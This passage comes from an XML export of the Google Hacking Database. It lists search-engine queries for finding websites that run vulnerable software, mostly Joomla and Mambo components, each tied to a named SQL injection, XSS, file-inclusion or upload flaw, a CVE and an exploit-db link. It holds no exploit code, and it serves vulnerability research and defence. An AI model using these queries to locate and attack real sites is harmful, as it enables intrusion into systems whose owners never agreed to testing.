<edb>https://www.exploit-db.com/exploits/38488</edb>
<date>2015-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1091</id>
<link>https://www.exploit-db.com/ghdb/1091</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:chitchat.php &quot;choose graphic&quot;</shortDescription>
<textualDescription>rgod advises:Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. This search does not find vulnerable versions, only generic.software:site: http://www.cyber-cats.com/php/rgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.it[/code]</textualDescription>
<query>inurl:chitchat.php &quot;choose graphic&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=inurl%3Achitchat.php+%22choose+graphic%22&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-09-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>2646</id>
<link>https://www.exploit-db.com/ghdb/2646</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:choosecard.php?catid=</shortDescription>
<textualDescription>WEBBDOMAIN Post Card 1.02 (catid) SQL Injection Vulnerability - CVE: 2008-6622: https://www.exploit-db.com/exploits/6977</textualDescription>
<query>inurl:choosecard.php?catid=</query>
<querystring>https://www.google.com/search?q=inurl:choosecard.php%3Fcatid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6977</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2790</id>
<link>https://www.exploit-db.com/ghdb/2790</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:choosecard.php?catid=</shortDescription>
<textualDescription>post Card ( catid ) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11892</textualDescription>
<query>inurl:choosecard.php?catid=</query>
<querystring>https://www.google.com/search?q=inurl:choosecard.php%3Fcatid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/11892</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>830</id>
<link>https://www.exploit-db.com/ghdb/830</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:citrix/metaframexp/default/login.asp? ClientDetection=On</shortDescription>
<textualDescription>Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to &quot;published&quot; folders, files, drives, and applications on the server and often the attached network. There is a XSS vulnerability in a widely used version of their Web Interface. As reported on Securiteam.com:http://www.securiteam.com/securitynews/6X0020K8VW.html A simple test is inlcluded in the advisory.</textualDescription>
<query>inurl:citrix/metaframexp/default/login.asp? ClientDetection=On</query>
<querystring>https://www.google.com/search?q=inurl%3Acitrix%2Fmetaframexp%2Fdefault%2Flogin.asp%3FClientDetection%3DOn&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-01-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1603</id>
<link>https://www.exploit-db.com/ghdb/1603</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:classified.php phpbazar</shortDescription>
<textualDescription>phpBazar 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities - CVE: 2006-2527: https://www.exploit-db.com/exploits/1804</textualDescription>
<query>inurl:classified.php phpbazar</query>
<querystring>https://www.google.com/search?q=inurl:classified.php+phpbazar</querystring>
<edb>https://www.exploit-db.com/exploits/1804</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1538</id>
<link>https://www.exploit-db.com/ghdb/1538</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:classified/product_desc.php?id=</shortDescription>
<textualDescription>GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability - CVE: 2008-3585: https://www.exploit-db.com/exploits/6189</textualDescription>
<query>inurl:classified/product_desc.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:classified/product_desc.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6189</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2284</id>
<link>https://www.exploit-db.com/ghdb/2284</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:classifieds/view.php?category=</shortDescription>
<textualDescription>YourFreeWorld Classifieds (category) Remote SQL Injection Vulnerability - CVE: 2008-3755: https://www.exploit-db.com/exploits/6945</textualDescription>
<query>inurl:classifieds/view.php?category=</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:classifieds/view.php%3Fcategory%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6945</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>414</id>
<link>https://www.exploit-db.com/ghdb/414</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:comersus_message.asp</shortDescription>
<textualDescription>About Comercus: &quot;Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers.&quot;Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/ This search finds the XSS vulnerable file comersus_message.asp?message= ..No version info is included with the search. Not all results are vulnerable.</textualDescription>
<query>inurl:comersus_message.asp</query>
<querystring>https://www.google.com/search?q=inurl%3Acomersus_message.asp</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>1508</id>
<link>https://www.exploit-db.com/ghdb/1508</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.</shortDescription>
<textualDescription>Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns - CVE: 2009-3718: https://www.exploit-db.com/exploits/9183</textualDescription>
<query>inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.</query>
<querystring>https://www.google.com/search?q=inurl:comment.asp+intext:Your+e-mail+address+will+be+used+to+send+you+voting+and+comment+activity.+Inclusion+of+your+address+is+optional+but+Battle+Blog+cannot+notify+you+of+these+activities+unless+you+supply+an+accurate+e-</querystring>
<edb>https://www.exploit-db.com/exploits/9183</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3644</id>
<link>https://www.exploit-db.com/ghdb/3644</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_amresurrected</shortDescription>
<textualDescription>Submitter: Bl4ck.Viper SQL Injection: index.php?option=com_amresurrected&amp;Itemid=[Sqli]</textualDescription>
<query>inurl:com_amresurrected</query>
<querystring>https://www.google.com/search?q=inurl:com_amresurrected</querystring>
<edb></edb>
<date>2010-12-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3290</id>
<link>https://www.exploit-db.com/ghdb/3290</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_annonces</shortDescription>
<textualDescription>Joomla Component com_annonces Upload Vulnerability: https://www.exploit-db.com/exploits/13748</textualDescription>
<query>inurl:com_annonces</query>
<querystring>https://www.google.com/search?q=inurl:com_annonces</querystring>
<edb>https://www.exploit-db.com/exploits/13748</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2595</id>
<link>https://www.exploit-db.com/ghdb/2595</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_awd_song</shortDescription>
<textualDescription>Joomla JE Awd Song Component Persistent XSS Vulnerability - CVE: 2010-2613: https://www.exploit-db.com/exploits/14059</textualDescription>
<query>inurl:com_awd_song</query>
<querystring>https://www.google.com/search?q=inurl:com_awd_song</querystring>
<edb>https://www.exploit-db.com/exploits/14059</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1960</id>
<link>https://www.exploit-db.com/ghdb/1960</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_beamospetition</shortDescription>
<textualDescription>Joomla Component beamospetition Remote SQL Injection Vulnerability - CVE: 2008-3132: https://www.exploit-db.com/exploits/5965</textualDescription>
<query>inurl:com_beamospetition</query>
<querystring>https://www.google.com/search?q=inurl:com_beamospetition</querystring>
<edb>https://www.exploit-db.com/exploits/5965</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3003</id>
<link>https://www.exploit-db.com/ghdb/3003</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_bfsurvey_profree</shortDescription>
<textualDescription>Joomla Component BF Survey Pro Free SQL Injection - CVE: 2009-4625: https://www.exploit-db.com/exploits/9601</textualDescription>
<query>inurl:com_bfsurvey_profree</query>
<querystring>https://www.google.com/search?q=inurl:com_bfsurvey_profree</querystring>
<edb>https://www.exploit-db.com/exploits/9601</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2497</id>
<link>https://www.exploit-db.com/ghdb/2497</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_brightweblinks</shortDescription>
<textualDescription>Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability - CVE: 2008-3083: https://www.exploit-db.com/exploits/5993</textualDescription>
<query>inurl:com_brightweblinks</query>
<querystring>https://www.google.com/search?q=inurl:com_brightweblinks</querystring>
<edb>https://www.exploit-db.com/exploits/5993</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1536</id>
<link>https://www.exploit-db.com/ghdb/1536</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_clanlist</shortDescription>
<textualDescription>Joomla Component (com_clanlist) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15456</textualDescription>
<query>inurl:com_clanlist</query>
<querystring>https://www.google.com/search?q=inurl:com_clanlist</querystring>
<edb>https://www.exploit-db.com/exploits/15456</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1895</id>
<link>https://www.exploit-db.com/ghdb/1895</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_colophon</shortDescription>
<textualDescription>Mambo Colophon Component 1.2 Remote Inclusion Vulnerability - CVE: 2006-3969: https://www.exploit-db.com/exploits/2085</textualDescription>
<query>inurl:com_colophon</query>
<querystring>https://www.google.com/search?q=inurl:com_colophon</querystring>
<edb>https://www.exploit-db.com/exploits/2085</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2443</id>
<link>https://www.exploit-db.com/ghdb/2443</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_community</shortDescription>
<textualDescription>Joomla Template BizWeb com_community Persistent XSS Vulnerability: https://www.exploit-db.com/exploits/13955</textualDescription>
<query>inurl:com_community</query>
<querystring>https://www.google.com/search?q=inurl:com_community</querystring>
<edb>https://www.exploit-db.com/exploits/13955</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2663</id>
<link>https://www.exploit-db.com/ghdb/2663</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_content</shortDescription>
<textualDescription>Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln - CVE: 2008-6923: https://www.exploit-db.com/exploits/6025</textualDescription>
<query>inurl:com_content</query>
<querystring>https://www.google.com/search?q=inurl:com_content</querystring>
<edb>https://www.exploit-db.com/exploits/6025</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1783</id>
<link>https://www.exploit-db.com/ghdb/1783</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_cpg</shortDescription>
<textualDescription>Mambo CopperminePhotoGalery Component Remote Include Vulnerability - CVE: 2006-4321: https://www.exploit-db.com/exploits/2196</textualDescription>
<query>inurl:com_cpg</query>
<querystring>https://www.google.com/search?q=inurl:com_cpg</querystring>
<edb>https://www.exploit-db.com/exploits/2196</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2918</id>
<link>https://www.exploit-db.com/ghdb/2918</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_djclassifieds</shortDescription>
<textualDescription>Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability: https://www.exploit-db.com/exploits/12479</textualDescription>
<query>inurl:com_djclassifieds</query>
<querystring>https://www.google.com/search?q=inurl%3Acom_djclassifieds</querystring>
<edb>https://www.exploit-db.com/exploits/12479</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1817</id>
<link>https://www.exploit-db.com/ghdb/1817</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_doqment</shortDescription>
<textualDescription>Joomla Component com_doqment (cid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10965</textualDescription>
<query>inurl:com_doqment</query>
<querystring>https://www.google.com/search?q=inurl:com_doqment</querystring>
<edb>https://www.exploit-db.com/exploits/10965</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1924</id>
<link>https://www.exploit-db.com/ghdb/1924</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_DTRegister eventId</shortDescription>
<textualDescription>Joomla Component DT Register Remote SQL injection Vulnerability - CVE: 2008-3265: https://www.exploit-db.com/exploits/6086</textualDescription>
<query>inurl:com_DTRegister eventId</query>
<querystring>https://www.google.com/search?q=inurl:com_DTRegister+eventId</querystring>
<edb>https://www.exploit-db.com/exploits/6086</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3014</id>
<link>https://www.exploit-db.com/ghdb/3014</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_eportfolio</shortDescription>
<textualDescription>Joomla Component com_eportfolio Upload Vulnerability: https://www.exploit-db.com/exploits/13951</textualDescription>
<query>inurl:com_eportfolio</query>
<querystring>https://www.google.com/search?q=inurl:com_eportfolio</querystring>
<edb>https://www.exploit-db.com/exploits/13951</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1774</id>
<link>https://www.exploit-db.com/ghdb/1774</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_eQuotes</shortDescription>
<textualDescription>Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability - CVE: 2008-2628: https://www.exploit-db.com/exploits/5723</textualDescription>
<query>inurl:com_eQuotes</query>
<querystring>https://www.google.com/search?q=inurl:com_eQuotes</querystring>
<edb>https://www.exploit-db.com/exploits/5723</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1890</id>
<link>https://www.exploit-db.com/ghdb/1890</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_expshop</shortDescription>
<textualDescription>Joomla Component EXP Shop (catid) SQL Injection Vulnerability - CVE: 2008-2892: https://www.exploit-db.com/exploits/5893</textualDescription>
<query>inurl:com_expshop</query>
<querystring>https://www.google.com/search?q=inurl:com_expshop</querystring>
<edb>https://www.exploit-db.com/exploits/5893</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2720</id>
<link>https://www.exploit-db.com/ghdb/2720</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_ezautos</shortDescription>
<textualDescription>Joomla Component (com_ezautos) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15085</textualDescription>
<query>inurl:com_ezautos</query>
<querystring>https://www.google.com/search?q=inurl:com_ezautos</querystring>
<edb>https://www.exploit-db.com/exploits/15085</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3088</id>
<link>https://www.exploit-db.com/ghdb/3088</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_ezstore</shortDescription>
<textualDescription>Joomla Component EZ Store Remote Blind SQL Injection - CVE: 2008-3586: https://www.exploit-db.com/exploits/6199</textualDescription>
<query>inurl:com_ezstore</query>
<querystring>https://www.google.com/search?q=inurl:com_ezstore</querystring>
<edb>https://www.exploit-db.com/exploits/6199</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1766</id>
<link>https://www.exploit-db.com/ghdb/1766</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_filiale</shortDescription>
<textualDescription>Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability - CVE: 2008-1935: https://www.exploit-db.com/exploits/5488</textualDescription>
<query>inurl:com_filiale</query>
<querystring>https://www.google.com/search?q=inurl:com_filiale</querystring>
<edb>https://www.exploit-db.com/exploits/5488</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2132</id>
<link>https://www.exploit-db.com/ghdb/2132</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_flippingbook</shortDescription>
<textualDescription>Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability - CVE: 2008-2095: https://www.exploit-db.com/exploits/5484</textualDescription>
<query>inurl:com_flippingbook</query>
<querystring>https://www.google.com/search?q=inurl:com_flippingbook</querystring>
<edb>https://www.exploit-db.com/exploits/5484</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2073</id>
<link>https://www.exploit-db.com/ghdb/2073</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_forum</shortDescription>
<textualDescription>com_forum Mambo Component</textualDescription>
<query>inurl:com_forum</query>
<querystring>https://www.google.com/search?q=inurl:com_forum</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2431</id>
<link>https://www.exploit-db.com/ghdb/2431</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_gamesbox</shortDescription>
<textualDescription>Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability - CVE: 2010-2690: https://www.exploit-db.com/exploits/14126</textualDescription>
<query>inurl:com_gamesbox</query>
<querystring>https://www.google.com/search?q=inurl:com_gamesbox</querystring>
<edb>https://www.exploit-db.com/exploits/14126</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2717</id>
<link>https://www.exploit-db.com/ghdb/2717</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_gigcal</shortDescription>
<textualDescription>Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln - CVE: 2009-0726: https://www.exploit-db.com/exploits/7746</textualDescription>
<query>inurl:com_gigcal</query>
<querystring>https://www.google.com/search?q=inurl:com_gigcal</querystring>
<edb>https://www.exploit-db.com/exploits/7746</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2927</id>
<link>https://www.exploit-db.com/ghdb/2927</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_ice &quot;catid&quot;</shortDescription>
<textualDescription>Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln - CVE: 2008-6852: https://www.exploit-db.com/exploits/7572</textualDescription>
<query>inurl:com_ice &quot;catid&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Acom_ice+%22catid%22</querystring>
<edb>https://www.exploit-db.com/exploits/7572</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2029</id>
<link>https://www.exploit-db.com/ghdb/2029</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_idoblog</shortDescription>
<textualDescription>Joomla Component iDoBlog b24 Remote SQL Injection Vulnerability - CVE: 2008-2627: https://www.exploit-db.com/exploits/5730</textualDescription>
<query>inurl:com_idoblog</query>
<querystring>https://www.google.com/search?q=inurl:com_idoblog</querystring>
<edb>https://www.exploit-db.com/exploits/5730</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1509</id>
<link>https://www.exploit-db.com/ghdb/1509</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_img</shortDescription>
<textualDescription>Joomla Component (com_img) LFI Vulnerability: https://www.exploit-db.com/exploits/15470</textualDescription>
<query>inurl:com_img</query>
<querystring>https://www.google.com/search?q=inurl:com_img</querystring>
<edb>https://www.exploit-db.com/exploits/15470</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3254</id>
<link>https://www.exploit-db.com/ghdb/3254</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_iproperty</shortDescription>
<textualDescription>Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability - CVE: 2010-1721: https://www.exploit-db.com/exploits/12246</textualDescription>
<query>inurl:com_iproperty</query>
<querystring>https://www.google.com/search?q=inurl:com_iproperty</querystring>
<edb>https://www.exploit-db.com/exploits/12246</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2103</id>
<link>https://www.exploit-db.com/ghdb/2103</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jabode</shortDescription>
<textualDescription>Joomla Component jabode (id) Remote SQL Injection Vulnerability - CVE: 2008-7169: https://www.exploit-db.com/exploits/5963</textualDescription>
<query>inurl:com_jabode</query>
<querystring>https://www.google.com/search?q=inurl:com_jabode</querystring>
<edb>https://www.exploit-db.com/exploits/5963</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3042</id>
<link>https://www.exploit-db.com/ghdb/3042</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jb2</shortDescription>
<textualDescription>Joomla Component JooBlog 0.1.1 Blind SQL Injection - CVE: 2008-2630: https://www.exploit-db.com/exploits/5734</textualDescription>
<query>inurl:com_jb2</query>
<querystring>https://www.google.com/search?q=inurl:com_jb2</querystring>
<edb>https://www.exploit-db.com/exploits/5734</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2533</id>
<link>https://www.exploit-db.com/ghdb/2533</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jcommunity</shortDescription>
<textualDescription>joomla com_jcommunity SQLi Vulnerability: https://www.exploit-db.com/exploits/13798</textualDescription>
<query>inurl:com_jcommunity</query>
<querystring>https://www.google.com/search?q=inurl:com_jcommunity</querystring>
<edb>https://www.exploit-db.com/exploits/13798</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3653</id>
<link>https://www.exploit-db.com/ghdb/3653</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jeauto</shortDescription>
<textualDescription>LFI: https://www.exploit-db.com/exploits/15779</textualDescription>
<query>inurl:com_jeauto</query>
<querystring>https://www.google.com/search?q=inurl:com_jeauto</querystring>
<edb>https://www.exploit-db.com/exploits/15779</edb>
<date>2010-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>3006</id>
<link>https://www.exploit-db.com/ghdb/3006</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jejob</shortDescription>
<textualDescription>Joomla JE Job Component com_jejob LFI Vulnerability: https://www.exploit-db.com/exploits/14063</textualDescription>
<query>inurl:com_jejob</query>
<querystring>https://www.google.com/search?q=inurl:com_jejob</querystring>
<edb>https://www.exploit-db.com/exploits/14063</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3108</id>
<link>https://www.exploit-db.com/ghdb/3108</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jejob</shortDescription>
<textualDescription>Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12782</textualDescription>
<query>inurl:com_jejob</query>
<querystring>https://www.google.com/search?q=inurl:com_jejob</querystring>
<edb>https://www.exploit-db.com/exploits/12782</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2997</id>
<link>https://www.exploit-db.com/ghdb/2997</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jepoll</shortDescription>
<textualDescription>Joomla Component com_jepoll (pollid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12781</textualDescription>
<query>inurl:com_jepoll</query>
<querystring>https://www.google.com/search?q=inurl:com_jepoll</querystring>
<edb>https://www.exploit-db.com/exploits/12781</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2506</id>
<link>https://www.exploit-db.com/ghdb/2506</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jmarket</shortDescription>
<textualDescription>joomla com_jmarket SQLi Vulnerability: https://www.exploit-db.com/exploits/13799</textualDescription>
<query>inurl:com_jmarket</query>
<querystring>https://www.google.com/search?q=inurl:com_jmarket</querystring>
<edb>https://www.exploit-db.com/exploits/13799</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2527</id>
<link>https://www.exploit-db.com/ghdb/2527</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jnewsletter</shortDescription>
<textualDescription>joomla com_jnewsletter SQLi Vulnerability: https://www.exploit-db.com/exploits/13804</textualDescription>
<query>inurl:com_jnewsletter</query>
<querystring>https://www.google.com/search?q=inurl:com_jnewsletter</querystring>
<edb>https://www.exploit-db.com/exploits/13804</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2050</id>
<link>https://www.exploit-db.com/ghdb/2050</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jomestate</shortDescription>
<textualDescription>Joomla Hot Property com_jomestate RFI Vulnerability: https://www.exploit-db.com/exploits/13956</textualDescription>
<query>inurl:com_jomestate</query>
<querystring>https://www.google.com/search?q=inurl:com_jomestate</querystring>
<edb>https://www.exploit-db.com/exploits/13956</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2715</id>
<link>https://www.exploit-db.com/ghdb/2715</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jomtube</shortDescription>
<textualDescription>Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection: https://www.exploit-db.com/exploits/14434</textualDescription>
<query>inurl:com_jomtube</query>
<querystring>https://www.google.com/search?q=inurl:com_jomtube</querystring>
<edb>https://www.exploit-db.com/exploits/14434</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1458</id>
<link>https://www.exploit-db.com/ghdb/1458</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_joomladate</shortDescription>
<textualDescription>Joomla Component JoomlaDate (user) SQL injection Vulnerability - CVE: 2008-6068: https://www.exploit-db.com/exploits/5748</textualDescription>
<query>inurl:com_joomladate</query>
<querystring>https://www.google.com/search?q=inurl:com_joomladate</querystring>
<edb>https://www.exploit-db.com/exploits/5748</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2526</id>
<link>https://www.exploit-db.com/ghdb/2526</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_joomradio</shortDescription>
<textualDescription>Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability - CVE: 2008-2633: https://www.exploit-db.com/exploits/5729</textualDescription>
<query>inurl:com_joomradio</query>
<querystring>https://www.google.com/search?q=inurl:com_joomradio</querystring>
<edb>https://www.exploit-db.com/exploits/5729</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3017</id>
<link>https://www.exploit-db.com/ghdb/3017</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jotloader</shortDescription>
<textualDescription>Joomla Component jotloader 1.2.1.a Blind SQL injection - CVE: 2008-2564: https://www.exploit-db.com/exploits/5737</textualDescription>
<query>inurl:com_jotloader</query>
<querystring>https://www.google.com/search?q=inurl:com_jotloader</querystring>
<edb>https://www.exploit-db.com/exploits/5737</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3304</id>
<link>https://www.exploit-db.com/ghdb/3304</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jp_jobs</shortDescription>
<textualDescription>Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability - CVE: 2010-1350: https://www.exploit-db.com/exploits/12191</textualDescription>
<query>inurl:com_jp_jobs</query>
<querystring>https://www.google.com/search?q=inurl:com_jp_jobs</querystring>
<edb>https://www.exploit-db.com/exploits/12191</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2484</id>
<link>https://www.exploit-db.com/ghdb/2484</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jstore</shortDescription>
<textualDescription>joomla com_jstore SQLi Vulnerability: https://www.exploit-db.com/exploits/13796</textualDescription>
<query>inurl:com_jstore</query>
<querystring>https://www.google.com/search?q=inurl:com_jstore</querystring>
<edb>https://www.exploit-db.com/exploits/13796</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2507</id>
<link>https://www.exploit-db.com/ghdb/2507</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_jtickets</shortDescription>
<textualDescription>joomla com_jtickets SQLi Vulnerability: https://www.exploit-db.com/exploits/13797</textualDescription>
<query>inurl:com_jtickets</query>
<querystring>https://www.google.com/search?q=inurl:com_jtickets</querystring>
<edb>https://www.exploit-db.com/exploits/13797</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2584</id>
<link>https://www.exploit-db.com/ghdb/2584</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_liveticker</shortDescription>
<textualDescription>Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln - CVE: 2008-6148: https://www.exploit-db.com/exploits/7573</textualDescription>
<query>inurl:com_liveticker</query>
<querystring>https://www.google.com/search?q=inurl:com_liveticker</querystring>
<edb>https://www.exploit-db.com/exploits/7573</edb>
